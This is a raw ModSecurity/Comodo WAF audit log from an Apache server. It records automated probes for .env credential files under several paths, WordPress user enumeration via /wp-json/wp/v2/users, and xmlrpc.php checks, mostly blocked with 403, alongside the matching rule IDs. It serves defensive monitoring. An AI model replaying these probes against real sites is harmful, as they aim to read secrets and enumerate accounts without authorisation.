Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746180874326985 787 (- - -)
Stopwatch2: 1746180874326985 787; combined=333, p1=306, p2=0, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5936b573-Z--
--d3c9e056-A--
[02/May/2025:17:27:54 +0700] aBSeKvNNWdC6CAybkqMJ7QAAAMw 103.236.140.4 38166 103.236.140.4 8181
--d3c9e056-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 159.65.144.72
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 159.65.144.72
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--d3c9e056-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d3c9e056-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746181674759305 835 (- - -)
Stopwatch2: 1746181674759305 835; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d3c9e056-Z--
--ec2d141e-A--
[02/May/2025:18:55:27 +0700] aBSyr8wZl97WzW7hutNVSAAAABI 103.236.140.4 39126 103.236.140.4 8181
--ec2d141e-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 167.172.158.128
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 167.172.158.128
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--ec2d141e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ec2d141e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746186927430930 887 (- - -)
Stopwatch2: 1746186927430930 887; combined=412, p1=383, p2=0, p3=0, p4=0, p5=29, sr=179, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ec2d141e-Z--
--ff231b62-A--
[02/May/2025:19:27:00 +0700] aBS6FBXwRgnphTBdhpRnngAAAI0 103.236.140.4 58172 103.236.140.4 8181
--ff231b62-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.249.57.219
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.249.57.219
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--ff231b62-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ff231b62-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746188820626158 2595 (- - -)
Stopwatch2: 1746188820626158 2595; combined=1200, p1=405, p2=770, p3=0, p4=0, p5=25, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ff231b62-Z--
--a8a6c030-A--
[02/May/2025:19:27:04 +0700] aBS6GBXwRgnphTBdhpRnoAAAAIY 103.236.140.4 58236 103.236.140.4 8181
--a8a6c030-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.249.57.219
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.249.57.219
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--a8a6c030-C--
demo.sayHello
--a8a6c030-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a8a6c030-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746188824720228 6808 (- - -)
Stopwatch2: 1746188824720228 6808; combined=4808, p1=603, p2=3954, p3=41, p4=42, p5=99, sr=77, sw=69, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a8a6c030-Z--
--4c0b8225-A--
[02/May/2025:20:17:47 +0700] aBTF-_NNWdC6CAybkqMQAgAAANI 103.236.140.4 35516 103.236.140.4 8181
--4c0b8225-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.87.81
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.87.81
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--4c0b8225-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4c0b8225-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746191867503522 3089 (- - -)
Stopwatch2: 1746191867503522 3089; combined=1379, p1=500, p2=850, p3=0, p4=0, p5=29, sr=133, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4c0b8225-Z--
--3fc7a757-A--
[02/May/2025:20:17:50 +0700] aBTF_vNNWdC6CAybkqMQAwAAAMM 103.236.140.4 35520 103.236.140.4 8181
--3fc7a757-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.87.81
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.87.81
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--3fc7a757-C--
demo.sayHello
--3fc7a757-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3fc7a757-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746191870557571 6434 (- - -)
Stopwatch2: 1746191870557571 6434; combined=4589, p1=644, p2=3707, p3=39, p4=42, p5=95, sr=82, sw=62, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3fc7a757-Z--
--59a6415a-A--
[02/May/2025:20:34:19 +0700] aBTJ28wZl97WzW7hutNbcgAAAA0 103.236.140.4 35660 103.236.140.4 8181
--59a6415a-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.95.77
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.95.77
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--59a6415a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--59a6415a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746192859913850 3116 (- - -)
Stopwatch2: 1746192859913850 3116; combined=1367, p1=456, p2=875, p3=0, p4=0, p5=35, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--59a6415a-Z--
--f7b7727d-A--
[02/May/2025:20:34:22 +0700] aBTJ3qGyUvHV-cebb6411QAAAEo 103.236.140.4 35664 103.236.140.4 8181
--f7b7727d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.95.77
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.95.77
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--f7b7727d-C--
demo.sayHello
--f7b7727d-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f7b7727d-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746192862697719 5501 (- - -)
Stopwatch2: 1746192862697719 5501; combined=4075, p1=562, p2=3299, p3=29, p4=33, p5=90, sr=76, sw=62, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f7b7727d-Z--
--b461875f-A--
[02/May/2025:20:42:42 +0700] aBTL0swZl97WzW7hutNbeAAAAAQ 103.236.140.4 35702 103.236.140.4 8181
--b461875f-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 93.123.109.81
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 93.123.109.81
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--b461875f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b461875f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746193362528881 848 (- - -)
Stopwatch2: 1746193362528881 848; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b461875f-Z--
--e3e45f00-A--
[02/May/2025:20:42:43 +0700] aBTL08wZl97WzW7hutNbeQAAAAA 103.236.140.4 35704 103.236.140.4 8181
--e3e45f00-B--
GET /api/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 93.123.109.81
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 93.123.109.81
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--e3e45f00-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e3e45f00-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746193363822481 740 (- - -)
Stopwatch2: 1746193363822481 740; combined=294, p1=264, p2=0, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e3e45f00-Z--
--c4369d58-A--
[02/May/2025:20:42:45 +0700] aBTL1cwZl97WzW7hutNbegAAAAY 103.236.140.4 35706 103.236.140.4 8181
--c4369d58-B--
GET /.env.save HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 93.123.109.81
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 93.123.109.81
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--c4369d58-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c4369d58-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746193365135747 710 (- - -)
Stopwatch2: 1746193365135747 710; combined=301, p1=267, p2=0, p3=0, p4=0, p5=33, sr=112, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c4369d58-Z--
--62e2883c-A--
[02/May/2025:20:42:46 +0700] aBTL1swZl97WzW7hutNbewAAAAM 103.236.140.4 35708 103.236.140.4 8181
--62e2883c-B--
GET /.env.prod HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 93.123.109.81
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 93.123.109.81
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--62e2883c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--62e2883c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746193366454066 952 (- - -)
Stopwatch2: 1746193366454066 952; combined=437, p1=396, p2=0, p3=0, p4=0, p5=41, sr=144, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--62e2883c-Z--
--5550432d-A--
[02/May/2025:20:42:54 +0700] aBTL3hXwRgnphTBdhpRpewAAAIM 103.236.140.4 35726 103.236.140.4 8181
--5550432d-B--
GET /dev/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 93.123.109.81
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 93.123.109.81
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--5550432d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5550432d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746193374581872 684 (- - -)
Stopwatch2: 1746193374581872 684; combined=263, p1=229, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5550432d-Z--
--9d4ff06e-A--
[02/May/2025:20:42:55 +0700] aBTL38wZl97WzW7hutNbggAAABU 103.236.140.4 35728 103.236.140.4 8181
--9d4ff06e-B--
GET /application/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 93.123.109.81
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 93.123.109.81
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--9d4ff06e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9d4ff06e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746193375275239 659 (- - -)
Stopwatch2: 1746193375275239 659; combined=248, p1=217, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9d4ff06e-Z--
--0552ce79-A--
[02/May/2025:21:26:04 +0700] aBTV_BXwRgnphTBdhpRplgAAAIQ 103.236.140.4 36022 103.236.140.4 8181
--0552ce79-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.211
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--0552ce79-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0552ce79-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746195964643888 790 (- - -)
Stopwatch2: 1746195964643888 790; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0552ce79-Z--
--e5c46977-A--
[02/May/2025:21:26:16 +0700] aBTWCPNNWdC6CAybkqMQMwAAAMI 103.236.140.4 36024 103.236.140.4 8181
--e5c46977-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.211
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--e5c46977-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e5c46977-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746195976057222 794 (- - -)
Stopwatch2: 1746195976057222 794; combined=315, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e5c46977-Z--
--af0a4139-A--
[02/May/2025:21:28:30 +0700] aBTWjhXwRgnphTBdhpRpmQAAAJA 103.236.140.4 36038 103.236.140.4 8181
--af0a4139-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.211
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--af0a4139-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--af0a4139-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746196110152497 792 (- - -)
Stopwatch2: 1746196110152497 792; combined=319, p1=280, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--af0a4139-Z--
--ad31ae0b-A--
[02/May/2025:21:28:34 +0700] aBTWkhXwRgnphTBdhpRpmgAAAI4 103.236.140.4 36040 103.236.140.4 8181
--ad31ae0b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.211
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--ad31ae0b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad31ae0b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746196114886740 641 (- - -)
Stopwatch2: 1746196114886740 641; combined=260, p1=226, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad31ae0b-Z--
--064c2c43-A--
